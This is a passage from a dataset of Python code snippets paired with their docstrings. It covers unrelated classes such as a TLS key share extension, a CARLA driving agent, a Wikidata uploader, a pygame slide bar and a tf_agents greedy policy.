<NEW_LINE> <DEDENT> return data <NEW_LINE> <DEDENT> def seek(self, offset, whence): <NEW_LINE> <INDENT> self.stream.seek(offset, offset, whence) <NEW_LINE> if whence == io.SEEK_SET: <NEW_LINE> <INDENT> self.bytesRead = offset <NEW_LINE> <DEDENT> elif whence == io.SEEK_CUR: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> elif whence == io.SEEK_END: <NEW_LINE> <INDENT> self.bytesRead = None
Context Manager to read a snapshot.
625990684428ac0f6e659cd9
class Configuration(object): <NEW_LINE> <INDENT> def __init__(self, sections, defs): <NEW_LINE> <INDENT> self.sections = sections <NEW_LINE> self.defs = defs <NEW_LINE> <DEDENT> def ClassifyTests(self, cases, env): <NEW_LINE> <INDENT> sections = [ s for s in self.sections if s.condition.Evaluate(env, self.defs) ] <NEW_LINE> all_rules = reduce(list.__add__, [s.rules for s in sections], []) <NEW_LINE> unused_rules = set(all_rules) <NEW_LINE> result = [] <NEW_LINE> for case in cases: <NEW_LINE> <INDENT> matches = [ r for r in all_rules if r.Contains(case.path) ] <NEW_LINE> outcomes_list = [ r.GetOutcomes(env, self.defs) for r in matches ] <NEW_LINE> outcomes = reduce(set.union, outcomes_list, set()) <NEW_LINE> unused_rules.difference_update(matches) <NEW_LINE> case.outcomes = set(outcomes) or set([PASS]) <NEW_LINE> result.append(case) <NEW_LINE> <DEDENT> return result, unused_rules
The parsed contents of a configuration file
6259906876e4537e8c3f0d2a
class ServerKeyShareExtension(TLSExtension): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super(ServerKeyShareExtension, self).__init__(extType=ExtensionType. key_share, server=True) <NEW_LINE> self.server_share = None <NEW_LINE> <DEDENT> def create(self, server_share): <NEW_LINE> <INDENT> self.server_share = server_share <NEW_LINE> return self <NEW_LINE> <DEDENT> @property <NEW_LINE> def extData(self): <NEW_LINE> <INDENT> if self.server_share is None: <NEW_LINE> <INDENT> return bytearray(0) <NEW_LINE> <DEDENT> w = Writer() <NEW_LINE> self.server_share.write(w) <NEW_LINE> return w.bytes <NEW_LINE> <DEDENT> def parse(self, parser): <NEW_LINE> <INDENT> if not parser.getRemainingLength(): <NEW_LINE> <INDENT> self.server_share = None <NEW_LINE> return self <NEW_LINE> <DEDENT> self.server_share = KeyShareEntry().parse(parser) <NEW_LINE> if parser.getRemainingLength(): <NEW_LINE> <INDENT> raise DecodeError("Trailing data in server Key Share extension") <NEW_LINE> <DEDENT> return self
Class for handling the Server Hello variant of the Key Share extension. Extension for sending the key shares to client
62599068adb09d7d5dc0bd11
class ChatRoom(object): <NEW_LINE> <INDENT> def display_message(self, user, message): <NEW_LINE> <INDENT> print("[{} says]: {}".format(user, message))
Mediator class
6259906899cbb53fe683268c
class CarlaAdAgent(object): <NEW_LINE> <INDENT> def __init__(self, role_name, target_speed, avoid_risk): <NEW_LINE> <INDENT> self._route_assigned = False <NEW_LINE> self._global_plan = None <NEW_LINE> self._agent = None <NEW_LINE> self._target_speed = target_speed <NEW_LINE> rospy.on_shutdown(self.on_shutdown) <NEW_LINE> vehicle_info = None <NEW_LINE> try: <NEW_LINE> <INDENT> vehicle_info = rospy.wait_for_message( "/carla/{}/vehicle_info".format(role_name), CarlaEgoVehicleInfo) <NEW_LINE> <DEDENT> except rospy.ROSException: <NEW_LINE> <INDENT> rospy.logerr("Timeout while waiting for world info!") <NEW_LINE> sys.exit(1) <NEW_LINE> <DEDENT> self._route_subscriber = rospy.Subscriber( "/carla/{}/waypoints".format(role_name), Path, self.path_updated) <NEW_LINE> self._target_speed_subscriber = rospy.Subscriber( "/carla/{}/target_speed".format(role_name), Float64, self.target_speed_updated) <NEW_LINE> self.vehicle_control_publisher = rospy.Publisher( "/carla/{}/vehicle_control_cmd".format(role_name), CarlaEgoVehicleControl, queue_size=1) <NEW_LINE> self._agent = BasicAgent(role_name, vehicle_info.id, avoid_risk) <NEW_LINE> <DEDENT> def on_shutdown(self): <NEW_LINE> <INDENT> rospy.loginfo("Shutting down, stopping ego vehicle...") <NEW_LINE> if self._agent: <NEW_LINE> <INDENT> self.vehicle_control_publisher.publish(self._agent.emergency_stop()) <NEW_LINE> <DEDENT> <DEDENT> def target_speed_updated(self, target_speed): <NEW_LINE> <INDENT> rospy.loginfo("New target speed received: {}".format(target_speed.data)) <NEW_LINE> self._target_speed = target_speed.data <NEW_LINE> <DEDENT> def path_updated(self, path): <NEW_LINE> <INDENT> rospy.loginfo("New plan with {} waypoints received.".format(len(path.poses))) <NEW_LINE> if self._agent: <NEW_LINE> <INDENT> self.vehicle_control_publisher.publish(self._agent.emergency_stop()) <NEW_LINE> <DEDENT> self._global_plan = path <NEW_LINE> self._route_assigned = False <NEW_LINE> <DEDENT> def run_step(self): <NEW_LINE> <INDENT> control = CarlaEgoVehicleControl() <NEW_LINE> control.steer = 0.0 <NEW_LINE> control.throttle = 0.0 <NEW_LINE> control.brake = 0.0 <NEW_LINE> control.hand_brake = False <NEW_LINE> if not self._agent: <NEW_LINE> <INDENT> rospy.loginfo("Waiting for ego vehicle...") <NEW_LINE> return control <NEW_LINE> <DEDENT> if not self._route_assigned and self._global_plan: <NEW_LINE> <INDENT> rospy.loginfo("Assigning plan...") <NEW_LINE> self._agent._local_planner.set_global_plan( self._global_plan.poses) <NEW_LINE> self._route_assigned = True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> control, finished = self._agent.run_step(self._target_speed) <NEW_LINE> if finished: <NEW_LINE> <INDENT> self._global_plan = None <NEW_LINE> self._route_assigned = False <NEW_LINE> <DEDENT> <DEDENT> return control <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> r = rospy.Rate(10) <NEW_LINE> while not rospy.is_shutdown(): <NEW_LINE> <INDENT> if self._global_plan: <NEW_LINE> <INDENT> control = self.run_step() <NEW_LINE> if control: <NEW_LINE> <INDENT> control.steer = -control.steer <NEW_LINE> self.vehicle_control_publisher.publish(control) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> r.sleep() <NEW_LINE> <DEDENT> except rospy.ROSInterruptException: <NEW_LINE> <INDENT> pass
A basic AD agent using CARLA waypoints
6259906838b623060ffaa425
class OnlyOneOSRepositoryAllowed(Exception): <NEW_LINE> <INDENT> pass
Raised when trying to more than one OS repository to a collection
62599068379a373c97d9a7c5
class Uploader(object): <NEW_LINE> <INDENT> TEST_ITEM = "Q4115189" <NEW_LINE> def add_labels(self, target_item, labels): <NEW_LINE> <INDENT> labels_for_upload = {} <NEW_LINE> for label in labels: <NEW_LINE> <INDENT> label_content = label['value'] <NEW_LINE> language = label['language'] <NEW_LINE> labels_for_upload[language] = label_content <NEW_LINE> <DEDENT> self.wdstuff.add_multiple_label_or_alias( labels_for_upload, target_item) <NEW_LINE> <DEDENT> def add_descriptions(self, target_item, descriptions): <NEW_LINE> <INDENT> descriptions_for_upload = {} <NEW_LINE> for description in descriptions: <NEW_LINE> <INDENT> desc_content = description['value'] <NEW_LINE> lang = description['language'] <NEW_LINE> descriptions_for_upload[lang] = desc_content <NEW_LINE> <DEDENT> self.wdstuff.add_multiple_descriptions( descriptions_for_upload, target_item) <NEW_LINE> <DEDENT> def add_claims(self, wd_item, claims): <NEW_LINE> <INDENT> if wd_item: <NEW_LINE> <INDENT> for claim in claims: <NEW_LINE> <INDENT> wd_item.get() <NEW_LINE> prop = claim["prop"] <NEW_LINE> value = claim["value"] <NEW_LINE> ref = claim["ref"] <NEW_LINE> self.wdstuff.addNewClaim(prop, value, wd_item, ref) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def create_new_item(self): <NEW_LINE> <INDENT> return self.wdstuff.make_new_item({}, self.summary) <NEW_LINE> <DEDENT> def get_username(self): <NEW_LINE> <INDENT> return pywikibot.config.usernames["wikidata"]["wikidata"] <NEW_LINE> <DEDENT> def upload(self): <NEW_LINE> <INDENT> if self.data["upload"] is False: <NEW_LINE> <INDENT> print("SKIPPING ITEM") <NEW_LINE> return <NEW_LINE> <DEDENT> labels = self.data["labels"] <NEW_LINE> descriptions = self.data["descriptions"] <NEW_LINE> claims = self.data["statements"] <NEW_LINE> self.add_labels(self.wd_item, labels) <NEW_LINE> self.add_descriptions(self.wd_item, descriptions) <NEW_LINE> self.add_claims(self.wd_item, claims) <NEW_LINE> <DEDENT> def set_wd_item(self): <NEW_LINE> <INDENT> if self.live: <NEW_LINE> <INDENT> if self.data["wd-item"] is None: <NEW_LINE> <INDENT> self.wd_item = self.create_new_item() <NEW_LINE> self.wd_item_q = self.wd_item.getID() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> item_q = self.data["wd-item"] <NEW_LINE> self.wd_item = self.wdstuff.QtoItemPage(item_q) <NEW_LINE> self.wd_item_q = item_q <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.wd_item = self.wdstuff.QtoItemPage(self.TEST_ITEM) <NEW_LINE> self.wd_item_q = self.TEST_ITEM <NEW_LINE> <DEDENT> <DEDENT> def __init__(self, data_object, repo, live=False, edit_summary=None): <NEW_LINE> <INDENT> self.repo = repo <NEW_LINE> self.live = live <NEW_LINE> if self.live: <NEW_LINE> <INDENT> print("LIVE MODE") <NEW_LINE> self.summary = edit_summary <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print("SANDBOX MODE: {}".format(self.TEST_ITEM)) <NEW_LINE> self.summary = SUMMARY_TEST <NEW_LINE> <DEDENT> print("User: {}".format(self.get_username())) <NEW_LINE> print("Edit summary: {}".format(self.summary)) <NEW_LINE> print("---------------") <NEW_LINE> self.data = data_object.wd_item <NEW_LINE> self.wdstuff = WDS(self.repo, edit_summary=self.summary) <NEW_LINE> self.set_wd_item()
Upload a WikidataItem.
62599068f7d966606f74948e
class DIYStage(object): <NEW_LINE> <INDENT> def __init__(self, path): <NEW_LINE> <INDENT> self.archive_file = None <NEW_LINE> self.path = path <NEW_LINE> self.source_path = path <NEW_LINE> self.created = True <NEW_LINE> <DEDENT> def __enter__(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def __exit__(self, exc_type, exc_val, exc_tb): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def fetch(self, *args, **kwargs): <NEW_LINE> <INDENT> tty.msg("No need to fetch for DIY.") <NEW_LINE> <DEDENT> def check(self): <NEW_LINE> <INDENT> tty.msg("No checksum needed for DIY.") <NEW_LINE> <DEDENT> def expand_archive(self): <NEW_LINE> <INDENT> tty.msg("Using source directory: %s" % self.source_path) <NEW_LINE> <DEDENT> def restage(self): <NEW_LINE> <INDENT> tty.die("Cannot restage DIY stage.") <NEW_LINE> <DEDENT> def create(self): <NEW_LINE> <INDENT> self.created = True <NEW_LINE> <DEDENT> def destroy(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def cache_local(self): <NEW_LINE> <INDENT> tty.msg("Sources for DIY stages are not cached")
Simple class that allows any directory to be a spack stage.
625990681b99ca4002290109
class SlideBar(BaseWidget): <NEW_LINE> <INDENT> def __init__(self, func, pos, size, min_=0, max_=100, step=1, color=BLUE, *, bg_color=LIGHT_GREY, show_val=True, interval=1, anchor=CENTER, inital=None, rounding=2, v_type=int): <NEW_LINE> <INDENT> super().__init__(pos, size, anchor) <NEW_LINE> self.color = color <NEW_LINE> self.bg_color = bg_color <NEW_LINE> self.func = func <NEW_LINE> self._value = inital if inital is not None else min_ <NEW_LINE> self.min = min_ <NEW_LINE> self.max = max_ <NEW_LINE> self.step = step <NEW_LINE> self.show_val = show_val <NEW_LINE> self.rounding = rounding <NEW_LINE> self.v_type = v_type <NEW_LINE> font = Font(self.height // 2) <NEW_LINE> self.text_val = SimpleText(self.get, lambda: (self.value_px, self.centery), bw_contrasted(self.color), font) <NEW_LINE> self.interval = interval <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return 'SlideBar({}:{}:{}; {}, Value: {})'.format(self.min, self.max, self.step, super().__repr__(), self.get()) <NEW_LINE> <DEDENT> def get(self): <NEW_LINE> <INDENT> return round(self.v_type(self._value), self.rounding) <NEW_LINE> <DEDENT> def set(self, value): <NEW_LINE> <INDENT> value = min(self.max, max(self.min, value)) <NEW_LINE> self._value = value <NEW_LINE> start_new_thread(self.func, (self.get(),)) <NEW_LINE> <DEDENT> def _start(self): <NEW_LINE> <INDENT> last_call = 42 <NEW_LINE> while self._focus: <NEW_LINE> <INDENT> sleep(1 / 100) <NEW_LINE> mouse = pygame.mouse.get_pos() <NEW_LINE> last_value = self.get() <NEW_LINE> self.value_px = mouse[0] <NEW_LINE> if self.get() == last_value: <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> if last_call + self.interval / 1000 < time(): <NEW_LINE> <INDENT> last_call = time() <NEW_LINE> self.func(self.get()) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def focus(self): <NEW_LINE> <INDENT> self._focus = True <NEW_LINE> start_new_thread(SlideBar._start, (self,)) <NEW_LINE> <DEDENT> @property <NEW_LINE> def value_px(self): <NEW_LINE> <INDENT> step = self.w / (self.max - self.min) <NEW_LINE> return self.x + step * (self.get() - self.min) <NEW_LINE> <DEDENT> @value_px.setter <NEW_LINE> def value_px(self, value): <NEW_LINE> <INDENT> value = min(self.right, max(self.left, value)) <NEW_LINE> delta_x = value - self.x <NEW_LINE> prop = delta_x / self.width <NEW_LINE> real = prop * (self.max - self.min) <NEW_LINE> self._value = self.min + round(real / self.step) * self.step <NEW_LINE> <DEDENT> def render(self, display): <NEW_LINE> <INDENT> bar_rect = pygame.Rect(0, 0, self.width, self.height // 3) <NEW_LINE> bar_rect.center = self.center <NEW_LINE> display.fill(self.bg_color, bar_rect) <NEW_LINE> circle(display, (self.value_px, self.centery), self.height // 2, self.color) <NEW_LINE> if self.show_val: <NEW_LINE> <INDENT> self.text_val.render(display)
A slide bar to bick a value in a range. Don't forget to call focus() and unfocus() when the user click on the SlideBar
625990687c178a314d78e7bf
class AddCommentsView(View): <NEW_LINE> <INDENT> def post(self,request): <NEW_LINE> <INDENT> if not request.user.is_authenticated: <NEW_LINE> <INDENT> return HttpResponse('{"status":"fail","msg":"用户未登录"}',content_type='application/json') <NEW_LINE> <DEDENT> course_id = request.POST.get("course_id",0) <NEW_LINE> comments = request.POST.get("comments","") <NEW_LINE> if int(course_id) > 0 and comments: <NEW_LINE> <INDENT> course_comments = CourseComments() <NEW_LINE> course = Course.objects.get(id=course_id) <NEW_LINE> course_comments.course = course <NEW_LINE> course_comments.comments = comments <NEW_LINE> course_comments.user = request.user <NEW_LINE> course_comments.save() <NEW_LINE> return HttpResponse('{"status":"success","msg":"添加成功"}', content_type='application/json') <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return HttpResponse('{"status":"fail","msg":"添加失败"}',content_type='application/json')
添加用户评论
625990687b25080760ed88b5
class MealEntry(Model): <NEW_LINE> <INDENT> MEAL_OPTIONS = ['BREAKFAST', 'LUNCH', 'DINNER', 'SNACK', 'MINI_MEAL'] <NEW_LINE> created = ndb.DateTimeProperty(auto_now_add=True) <NEW_LINE> identity = ndb.StringProperty(choices=MEAL_OPTIONS)
Stores data about a meal
625990683617ad0b5ee078fa
class FirestoreProjectsDatabasesDocumentsWriteRequest(_messages.Message): <NEW_LINE> <INDENT> database = _messages.StringField(1, required=True) <NEW_LINE> writeRequest = _messages.MessageField('WriteRequest', 2)
A FirestoreProjectsDatabasesDocumentsWriteRequest object. Fields: database: The database name. In the format: `projects/{project_id}/databases/{database_id}`. This is only required in the first message. writeRequest: A WriteRequest resource to be passed as the request body.
62599068498bea3a75a591d5
class ExtractionMismatch(PyetcException): <NEW_LINE> <INDENT> def __init__(self, value, results=None): <NEW_LINE> <INDENT> PyetcException.__init__(self, value, results) <NEW_LINE> self.name = "Extracted instances are not the same"
Raised when Extracted instances that should match don't.
625990687047854f46340b5c
class FileUtils(object): <NEW_LINE> <INDENT> _instance = None <NEW_LINE> DRY_RUN = False <NEW_LINE> @classmethod <NEW_LINE> def Configure(cls, dry_run): <NEW_LINE> <INDENT> cls.DRY_RUN = dry_run <NEW_LINE> <DEDENT> def __new__(cls, *args, **kwargs): <NEW_LINE> <INDENT> if not cls._instance: <NEW_LINE> <INDENT> if cls.DRY_RUN: <NEW_LINE> <INDENT> cls._instance = super(FileUtils, cls).__new__(MockFileUtils, *args, **kwargs) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> cls._instance = super(FileUtils, cls).__new__(cls, *args, **kwargs) <NEW_LINE> <DEDENT> <DEDENT> return cls._instance <NEW_LINE> <DEDENT> def Md5File(self, filename, log_level='verbose', _block_size=2**10): <NEW_LINE> <INDENT> command = 'md5sum %s' % filename <NEW_LINE> ce = command_executer.GetCommandExecuter(log_level=log_level) <NEW_LINE> ret, out, _ = ce.RunCommandWOutput(command) <NEW_LINE> if ret: <NEW_LINE> <INDENT> raise RuntimeError('Could not run md5sum on: %s' % filename) <NEW_LINE> <DEDENT> return out.strip().split()[0] <NEW_LINE> <DEDENT> def CanonicalizeChromeOSRoot(self, chromeos_root): <NEW_LINE> <INDENT> chromeos_root = os.path.expanduser(chromeos_root) <NEW_LINE> if os.path.isdir(os.path.join(chromeos_root, 'chromite')): <NEW_LINE> <INDENT> return chromeos_root <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def ChromeOSRootFromImage(self, chromeos_image): <NEW_LINE> <INDENT> chromeos_root = os.path.join( os.path.dirname(chromeos_image), '../../../../..') <NEW_LINE> return self.CanonicalizeChromeOSRoot(chromeos_root) <NEW_LINE> <DEDENT> def MkDirP(self, path): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> os.makedirs(path) <NEW_LINE> <DEDENT> except OSError as exc: <NEW_LINE> <INDENT> if exc.errno == errno.EEXIST: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def RmDir(self, path): <NEW_LINE> <INDENT> shutil.rmtree(path, ignore_errors=True) <NEW_LINE> <DEDENT> def WriteFile(self, path, contents): <NEW_LINE> <INDENT> with open(path, 'wb') as f: <NEW_LINE> <INDENT> f.write(contents)
Utilities for operations on files.
62599068a219f33f346c7fb0
class Committee(InheritanceGroup): <NEW_LINE> <INDENT> leader = models.ForeignKey( Member, on_delete=models.SET_NULL, verbose_name='leder', related_name='leader_of', blank=True, null=True, ) <NEW_LINE> leader_title = models.CharField('ledertittel', max_length=100, blank=True) <NEW_LINE> members = models.ManyToManyField( Member, verbose_name='medlemmer', related_name='committees', through='CommitteeMembership', ) <NEW_LINE> email = models.EmailField( verbose_name='e-post', max_length=255, unique=True, ) <NEW_LINE> description = models.TextField('beskrivelse', blank=True, default='') <NEW_LINE> order = models.IntegerField( 'rekkefølge', default=0, help_text='Dette angir rekkefølgen komiteene vises i. Lavere tall kommer først.') <NEW_LINE> @property <NEW_LINE> def ordered_members(self): <NEW_LINE> <INDENT> return self.user_set.all().order_by('committee_leader_of', 'is_on_leave', 'first_name', 'last_name') <NEW_LINE> <DEDENT> @property <NEW_LINE> def memberships(self): <NEW_LINE> <INDENT> return self.members.through.objects.filter(committee=self) <NEW_LINE> <DEDENT> class Meta: <NEW_LINE> <INDENT> verbose_name = 'komite' <NEW_LINE> verbose_name_plural = 'komiteer' <NEW_LINE> ordering = ('order',) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.name <NEW_LINE> <DEDENT> def add_member(self, member, title=None): <NEW_LINE> <INDENT> attrs = { 'member': member, 'committee': self, } <NEW_LINE> if title: <NEW_LINE> <INDENT> attrs['title'] = title <NEW_LINE> <DEDENT> self.members.through.objects.create(**attrs) <NEW_LINE> <DEDENT> def remove_member(self, member): <NEW_LINE> <INDENT> self.members.through.objects.filter(member=member).delete() <NEW_LINE> <DEDENT> def add_members(self, members): <NEW_LINE> <INDENT> for member in members: <NEW_LINE> <INDENT> self.add_member(member) <NEW_LINE> <DEDENT> <DEDENT> def member_titles(self): <NEW_LINE> <INDENT> return self.members.through.objects.filter(committee=self)
Store a committee.
625990683d592f4c4edbc687
class Fingerprinter(object): <NEW_LINE> <INDENT> sample_methods = [ 'bridge_hand', 'coin_tosses', 'die_rolls', 'floats', 'shuffle', 'words' ] <NEW_LINE> def __init__(self, generator): <NEW_LINE> <INDENT> self.generator = generator <NEW_LINE> self.state = self.generator.getstate() <NEW_LINE> <DEDENT> def bridge_hand(self): <NEW_LINE> <INDENT> return [self.generator.sample(CARDS, 13)] <NEW_LINE> <DEDENT> def coin_tosses(self): <NEW_LINE> <INDENT> return [self.generator.choice(['H', 'T']) for _ in range(100)] <NEW_LINE> <DEDENT> def die_rolls(self): <NEW_LINE> <INDENT> return [self.generator.randint(1, 6) for _ in range(20)] <NEW_LINE> <DEDENT> def floats(self): <NEW_LINE> <INDENT> return [self.generator.random() for _ in range(20)] <NEW_LINE> <DEDENT> def shuffle(self): <NEW_LINE> <INDENT> population = list(range(20)) <NEW_LINE> self.generator.shuffle(population) <NEW_LINE> return population <NEW_LINE> <DEDENT> def words(self): <NEW_LINE> <INDENT> return [self.generator.getrandbits(32) for _ in range(20)] <NEW_LINE> <DEDENT> def fingerprint(self): <NEW_LINE> <INDENT> fingerprint = {} <NEW_LINE> for method_name in self.sample_methods: <NEW_LINE> <INDENT> method = getattr(self, method_name) <NEW_LINE> with restore_state(self.generator): <NEW_LINE> <INDENT> fingerprint[method_name] = method() <NEW_LINE> <DEDENT> <DEDENT> return fingerprint
Generator of "standard" samples, for use in reproducibility tests.
625990687b180e01f3e49c38
class Market(Enum): <NEW_LINE> <INDENT> ROFEX = 'ROFX' <NEW_LINE> MERVAL = 'MERV - XMEV'
Market ID associated to the instruments. ROFEX: ROFEX Exchange.
6259906832920d7e50bc77ef
class CorrectText: <NEW_LINE> <INDENT> def __init__( self, lower=True, remove_spaces=True, add_punctuation=True, captalize=True, remove_double_pontuation=True, sent_tokenizer=None): <NEW_LINE> <INDENT> self.config = { "lower" : lower, "remove_spaces": remove_spaces, "add_punctuation": add_punctuation, "captalize": captalize, "remove_double_pontuation": remove_double_pontuation, "sent_tokenizer" : sent_tokenizer } <NEW_LINE> self.end_punctuation = '!.?;' <NEW_LINE> self.double_pontuation = '()[]{}' <NEW_LINE> <DEDENT> def remove_spaces(self, text): <NEW_LINE> <INDENT> text = re.sub(' {2,}', ' ', text) <NEW_LINE> text = re.sub(' ([{}])'.format( re.escape(punctuation)), r'\1', text) <NEW_LINE> return text.strip() <NEW_LINE> <DEDENT> def add_punctuation(self, text): <NEW_LINE> <INDENT> if list(text)[-1] not in punctuation: <NEW_LINE> <INDENT> return text + '.' <NEW_LINE> <DEDENT> return text <NEW_LINE> <DEDENT> def captalize(self, text, sent_tokenizer=None): <NEW_LINE> <INDENT> if self.config['lower']: <NEW_LINE> <INDENT> text = self.lower(text) <NEW_LINE> <DEDENT> if sent_tokenizer == None: <NEW_LINE> <INDENT> text = re.sub('([{}])'.format( re.escape(self.end_punctuation)), r'\1||', text) <NEW_LINE> text_parts = list( filter(lambda _: len(_) > 0, text.split('||')) ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> text_parts = sent_tokenizer(text) <NEW_LINE> <DEDENT> text_parts_processed = [] <NEW_LINE> for t in text_parts: <NEW_LINE> <INDENT> t = re.sub(',([^ ])', r', \1', t.strip()) <NEW_LINE> words = t.split(' ') <NEW_LINE> text_parts_processed.append( ' '.join([words[0].title()] + words[1:]) ) <NEW_LINE> <DEDENT> return ' '.join(text_parts_processed) <NEW_LINE> <DEDENT> def remove_double_pontuation(self, text): <NEW_LINE> <INDENT> not_double = punctuation <NEW_LINE> for d in self.double_pontuation: <NEW_LINE> <INDENT> not_double = not_double.replace(d, '') <NEW_LINE> <DEDENT> punct = re.escape(not_double) <NEW_LINE> pattern = '[{}]+([{}])'.format( punct, punct ) <NEW_LINE> if re.match(pattern, text) == False: <NEW_LINE> <INDENT> return text <NEW_LINE> <DEDENT> return re.sub(pattern, r'\1', text) <NEW_LINE> <DEDENT> def lower(self, text): <NEW_LINE> <INDENT> return text.lower() <NEW_LINE> <DEDENT> def transform(self, text): <NEW_LINE> <INDENT> if self.config['remove_double_pontuation']: <NEW_LINE> <INDENT> text = self.remove_double_pontuation(text) <NEW_LINE> <DEDENT> if self.config['remove_spaces']: <NEW_LINE> <INDENT> text = self.remove_spaces(text) <NEW_LINE> <DEDENT> if self.config['add_punctuation']: <NEW_LINE> <INDENT> text = self.add_punctuation(text) <NEW_LINE> <DEDENT> if self.config['captalize']: <NEW_LINE> <INDENT> text = self.captalize(text, self.config['sent_tokenizer']) <NEW_LINE> <DEDENT> return text
CorrectText Args: lower (bool): Transform text to lowercase before capitalize the first letters of the sentences. Default: True remove_spaces (bool): Transform text removing double spaces. Default: True add_punctuation (bool): Transform text adding dot where is no punctuation. Default: True captalize (bool): Transform text captalizing the first letter of each sentence. Default: True remove_double_pontuation (bool): Transform text removing double punctuation. Default: True sent_tokenizer (function): Function to utilize when capitalizing letters. Default: None
625990684a966d76dd5f069d
class JobRetry(ProcrastinateException): <NEW_LINE> <INDENT> def __init__(self, scheduled_at: datetime.datetime): <NEW_LINE> <INDENT> self.scheduled_at = scheduled_at <NEW_LINE> super().__init__()
Job should be retried.
625990684428ac0f6e659cda
class CocoConfig(Config): <NEW_LINE> <INDENT> NAME = "coco" <NEW_LINE> IMAGES_PER_GPU = 2 <NEW_LINE> NUM_CLASSES = 1 + 80
用來訓練MS COCO圖像資料集的Configuration類別 Derives from the base Config class and overrides values specific to the COCO dataset. 繼承自基礎Config類別,為MS COCO圖像資料集來覆寫某些設定的值
625990687d847024c075db82
@gin.configurable(module='tf_agents', blacklist=['policy']) <NEW_LINE> class GreedyPolicy(tf_policy.Base): <NEW_LINE> <INDENT> def __init__(self, policy, name=None): <NEW_LINE> <INDENT> super(GreedyPolicy, self).__init__( policy.time_step_spec, policy.action_spec, policy.policy_state_spec, policy.info_spec, emit_log_probability=policy.emit_log_probability, name=name) <NEW_LINE> self._wrapped_policy = policy <NEW_LINE> <DEDENT> @property <NEW_LINE> def wrapped_policy(self): <NEW_LINE> <INDENT> return self._wrapped_policy <NEW_LINE> <DEDENT> def _variables(self): <NEW_LINE> <INDENT> return self._wrapped_policy.variables() <NEW_LINE> <DEDENT> def _distribution(self, time_step, policy_state): <NEW_LINE> <INDENT> def dist_fn(dist): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> greedy_action = dist.mode() <NEW_LINE> <DEDENT> except NotImplementedError: <NEW_LINE> <INDENT> raise ValueError("Your network's distribution does not implement mode " "making it incompatible with a greedy policy.") <NEW_LINE> <DEDENT> return DeterministicWithLogProb(loc=greedy_action) <NEW_LINE> <DEDENT> distribution_step = self._wrapped_policy.distribution( time_step, policy_state) <NEW_LINE> return policy_step.PolicyStep( tf.nest.map_structure(dist_fn, distribution_step.action), distribution_step.state, distribution_step.info)
Returns greedy samples of a given policy.
6259906801c39578d7f14309
class LazyComputation(object): <NEW_LINE> <INDENT> def __init__(self, reads, writes): <NEW_LINE> <INDENT> self.reads = set(flatten(reads)) <NEW_LINE> self.writes = set(flatten(writes)) <NEW_LINE> self._scheduled = False <NEW_LINE> <DEDENT> def enqueue(self): <NEW_LINE> <INDENT> global _trace <NEW_LINE> _trace.append(self) <NEW_LINE> return self <NEW_LINE> <DEDENT> def _run(self): <NEW_LINE> <INDENT> assert False, "Not implemented"
Helper class holding computation to be carried later on.
6259906897e22403b383c6b6
class LaunchRequestHandler(AbstractRequestHandler): <NEW_LINE> <INDENT> def can_handle(self, handler_input): <NEW_LINE> <INDENT> return ask_utils.is_request_type('LaunchRequest')(handler_input) <NEW_LINE> <DEDENT> def handle(self, handler_input): <NEW_LINE> <INDENT> logger.info('HANDLER:LaunchRequest') <NEW_LINE> if handler_input.request_envelope.context.system.user.access_token is None: <NEW_LINE> <INDENT> return ( handler_input.response_builder .speak(PHR_NOT_CONNECTED) .set_card(Card('LinkAccount')) .response ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return ( handler_input.response_builder .speak(PHR_WELCOME) .ask(PHR_REPEAT) .response )
Handler for Skill Launch.
625990684f6381625f19a07a
class EditMixin: <NEW_LINE> <INDENT> def assertItemFieldsModified(self, library_items, items, fields=[], allowed=['path']): <NEW_LINE> <INDENT> for lib_item, item in zip(library_items, items): <NEW_LINE> <INDENT> diff_fields = [field for field in lib_item._fields if lib_item[field] != item[field]] <NEW_LINE> self.assertEqual(set(diff_fields).difference(allowed), set(fields)) <NEW_LINE> <DEDENT> <DEDENT> def run_mocked_interpreter(self, modify_file_args={}, stdin=[]): <NEW_LINE> <INDENT> m = ModifyFileMocker(**modify_file_args) <NEW_LINE> with patch('beetsplug.edit.edit', side_effect=m.action): <NEW_LINE> <INDENT> with control_stdin('\n'.join(stdin)): <NEW_LINE> <INDENT> self.importer.run() <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def run_mocked_command(self, modify_file_args={}, stdin=[], args=[]): <NEW_LINE> <INDENT> m = ModifyFileMocker(**modify_file_args) <NEW_LINE> with patch('beetsplug.edit.edit', side_effect=m.action): <NEW_LINE> <INDENT> with control_stdin('\n'.join(stdin)): <NEW_LINE> <INDENT> self.run_command('edit', *args)
Helper containing some common functionality used for the Edit tests.
62599068f7d966606f74948f
